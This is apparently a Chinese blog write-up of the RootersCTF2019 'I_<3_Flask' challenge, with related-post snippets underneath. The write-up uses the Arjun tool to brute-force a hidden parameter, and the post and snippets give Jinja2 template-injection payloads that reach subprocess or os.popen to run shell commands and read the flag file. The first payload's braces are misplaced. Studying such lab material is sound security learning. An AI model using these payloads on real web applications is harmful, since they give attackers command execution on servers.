[RootersCTF2019]I_<3_Flask(参数爆破工具arjun)

最新推荐文章于 2024-03-23 12:44:01 发布
最新推荐文章于 2024-03-23 12:44:01 发布
阅读量1.6k 收藏 3
点赞数
分类专栏: # 各平台题目
https://blog.csdn.net/qq_44657899
本文链接:https://blog.csdn.net/qq_44657899/article/details/119726513
版权

arjun安装

下载地址 s0md3v /Arjun 

cd Arjun-2.1.4
pip3 install arjun
py -3 setup.py install

如果输入arjun -h有如下输出则安装成功
在这里插入图片描述
解题

首先使用arjun爆破参数

arjun -u http://aac8b7e4-008f-486a-9642-232db8c62642.node4.buuoj.cn:81/ -c 100 -d 5

参数:

-d DELAY Delay between requests in seconds. (default: 0)

-c CHUNKS Chunk size. The number of parameters to be sent at once

爆破出参数name
在这里插入图片描述

首先7*7返回49,判断存在模板注入,然后就是常规SSTI了

# ls
?name={{''.__class__.__mro__[1].__subclasses__()[222]}}('ls',shell=True,stdout=-1).communicate()[0].strip()
# cat
?name={{''.__class__.__mro__[1].__subclasses__()[222]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
天问_Herbert555
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-[RootersCTF2019]I_3_Flask
weixin_49803180的博客
07-17 223
直接利用flask的一个方法:lipsum,在lipsum.__globals__含有os模块,利用方法:{{lipsum.__globals__['os'].popen('ls').read()}}name={{''.__class__.__base__.__subclasses__()[132].__init__}} #查看模块是否被加载。name={{%27%27.__class__.__base__.__subclasses__()}}#查看当前页面下,加载的子类。加载成功就可以利用了。
[RootersCTF2019]I_3_Flask
fmyyy1的博客
04-15 689
场景 猜测是jinja2的模板注入,用Arjun工具爆破参数 下载地址 找到了参数name 传参?name={{7*'7'}},注入成功 这题没有过滤,直接用常规的注入语句即可 ?name={% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').pop
[RootersCTF2019]I_3_Flask --- sql注入新方法:---‘0’+‘0’的奇怪方式来做 --- 二次注入--hex双重编码- 16进制---ascii也可以的
Zero_Adam的博客
04-04 590
一、自己看WP后写脚本 我连注册登陆的脚本都写不好,,,写了半天,最后的那个submit不用管,直接就登陆了,然后每次要换一次 邮箱 和 账号 import requests register_url="http://f22e5570-b535-4c98-9bb4-62b097db515b.node3.buuoj.cn/register.php" login_url="http://f22e5570-b535-4c98-9bb4-62b097db515b.node3.buuoj.cn/login.php"
第三次课c3.zip_flask_flask网站_网站 python
09-23
在本课程中,我们将深入探讨如何使用Python的Flask框架构建一个类似Instagram的网站。Flask是一个轻量级的Web服务器网关接口(WSGI)Web应用框架,它以其灵活性和简洁性而受到开发者的喜爱。这个“第三次课c3.zip”...
api.rar_API_IML语言_orwxh_python flask
09-23
在本文中,我们将深入探讨如何使用Python编程语言和Flask框架构建API,特别是与"IML语言"(可能指的是机器学习或数据科学中的接口)相关的API。标题中的"orwxh"可能是项目名称或者特定的功能模块,但由于缺乏具体...
Student_Management_system-FLASK:使用Flask的学生管理网站
05-27
Student_Management_system-FLASK 使用Flask的学生管理网站使用的技术:1-> Python(3.6)2-> Flask 3-> SQLite3 4-> HTML 5,CSS 3,Bootstrap 删除数据库文件运行home.py,使用:“ admin”作为用户名和密码设置...
blog_with_flask:Flask博客(Python微型框架)
05-21
这里的目的不是要开发一个完整的博客,而是要展示Flask如何用于轻松开发应用程序。 因此,用户可以执行的任务是: 列出文章单击文章标题以查看详细信息添加,修改和删除文章。先决条件您应该安装了Python 3和 。 ...
a-master (1).zip_Python 管理平台_flask_python flask_python 管理_python
09-21
Python Flask 是一个轻量级的Web服务程序框架,它以其简洁和模块化的代码结构而受到开发者们的喜爱。在“a-master (1).zip”这个压缩包中,我们很显然会发现一个基于Python Flask构建的奖项管理平台。这个平台可能是...
强大的端口扫描工具! 绝对无毒绿色!
07-13
强大的端口扫描工具! 绝对无毒绿色!快来下载,无毒!
Python-Arjun是一个用于查找隐藏的GET和POST参数的python脚本
08-10
Arjun是一个python脚本,用于使用regex和bruteforce查找隐藏的GET和POST参数
基于变结构控制策略的转台控制技术研究
05-05
本文是硕士学位论文,题目是《基于变结构控制策略的转台控制研究》。
[RootersCTF2019]I_3_Flask -不会编程的崽
最新发布
不会编程的崽的博客
03-23 517
参数爆破 简单的jinja&ssti
os模块
qq_45594312的博客
01-11 156
1.概述 os模块提供了多数操作系统的功能接口函数 当os模块被导入后,它会自适应于不同的操作系统平台,根据不同的平台进行相应的操作 在python编程时,经常和文件、目录打交道,所以离不了os模块 2.一些操作 1.返回操作系统类型 程序代码 运行结果 2.操作系统的详细信息 程序代码 运行结果 3.系统的环境边量 程序代码 运行结果 4.判断是否是绝对路径 程序代码 运行结...
ctf (Do_you_know_http)
Glacier_Mount的博客
06-27 2300
burp suite的简单应用
Hydra/Medusa爆破工具命令参数和简单操作
m0_73128456的博客
11-13 2099
l :指定单个用户名称-L:指定用户名称字典-p :指定单个密码-P :指定密码字典-vV :显示详细的执行过程-R :根据上一次进度继续破解-S :使用SSl协议连接-s :指定端口-o :输出文件-C :指定用户密码字典-e :空密码探测和指定用户密码探测-t :指定爆破时的任务数量(可以理解为线程数),默认为16-f :一但爆破成功一个就停止爆破-v/-V :显示爆破的详细信息-M :指定多个攻击目标,此参数为储存攻击目标的文件的路径(建议为绝对路径)。
CTFshow-web爆破
weixin_44770698的博客
06-24 906
CTFshow-web爆破wp
ctf-show爆破模块练习
m0_74097148的博客
04-11 645
之后执行如上命令,下面会自动回推可能种子,找到该题目对应的PHP版本,可以F12,在网络中查看到对应版本(我这里是7.3.11)
[rootersctf2019]i_<3_flask
04-09
不好意思,我是语言模型AI,无法直接回答该问题,但是我可以帮您翻译该问题的意思,该题目应该是一道CTF比赛中的题目,题目名称为"[rootersctf2019]i_<3_flask"。关于具体内容需要参加比赛的选手来解答。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值